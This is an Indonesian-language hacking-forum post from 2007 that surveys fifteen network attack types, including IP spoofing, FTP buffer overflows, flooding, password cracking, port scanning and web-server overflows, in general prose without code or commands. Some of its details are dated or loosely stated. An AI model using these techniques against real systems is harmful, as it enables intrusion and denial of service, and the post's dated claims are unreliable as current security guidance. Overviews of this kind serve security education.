rivalnya______________________ntar yang laen tambah nech Laughing_________________I'm nothingQUICK EDIT YOUR POSTLaSTSersan KepalaSersan KepalaPosts: 321Reputation: 11 Joined: 11 Apr 2007Location: behind your systemLaST is offline View user's profile Send private message Send e-mail Visit poster's website Yahoo Messenger Back to topPostPosted: Tue Jul 31, 2007 12:12 am Post subject: Reply with quoteQUICK EDIT YOUR POSTAttach signature (signatures can be changed in profile) close1. IP SpoofingIP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehinggasasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luarnetwork. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukanserangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dariNetworknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untukrouting biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudahuntuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attackertetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.2. FTP AttackSalah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yangdiakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untukmendapatkan command shell ataupun untuk melakukan Denial Of Service.Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambilresource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorangattacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisamembuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yangdiserang.Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang seringdilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki.Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu diupgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflowMengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounceattack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniffinformasi yang berada dalam sistem3. Unix Finger ExploitsPada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasidiantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkanperaturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yangsangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untukmelakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini jugamenyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user beradadalam sistem dan seberapa jauh user merawat sistem.Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuahsistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagiseorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untukmemanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.4. Flooding & BroadcastingSeorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secarasignificant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisamenangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihandinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semuastation yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan iniadalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnyamenyerah.Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/orvolume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitasbesar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itunetwork server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukuppower untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitasproses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besarakan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.5. Fragmented Packet AttacksData-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanyamengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapafirewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasialamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untukmenulis ulang informasi paket pertama dari suatu protokol.6. E-mail ExploitsPeng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (commandmanipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode(malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan emailbisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-fileaplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).7. DNS and BIND VulnerabilitiesBerita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain(BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisisyang diarahkan pada operasi dasar dari Internet (basic internet operation).8. Password AttacksPassword merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidakperduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksionline dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkinsaja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membukasesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yangdimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatihkaryawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapatmeminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadaihal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak(guessing), brute force, cracking dan sniffing.9.Proxy Server AttacksSalah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukanproses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyaikekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistemsaya akan bisa juga saya lakukan dalam system anda dan sebaliknya.10. Remote Command Processing AttacksTrusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resourcesharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggotanetwork kekuasaan akses yang sama di satu dan lain system (dalam network).Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawananpada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusiperintah dan mengkases data yang tersedia bagi user lainnya.11. Remote File System AttackProtocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel)yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara networkdan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untukmendapatkan akses ke direktori file.12. Selective Program InsertionsSelective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-programpenghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ) padasystem sasaran. Program-program penghancur ini sering juga disebut malware. Program-program inimempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai denganmembuka backdoor.13. Port ScanningMelalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagaimacam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untukpublik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.14.TCP/IP Sequence Stealing, Passive Port Listening and PacketInterceptionTCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkaninformasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force,serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.15. HTTPD AttacksKerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpdbypasses, cross scripting, web code vulnerabilities, dan URL floods.HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakanuntuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempatoverflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkanstring yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attackerakses ke command prompt. Smile Beer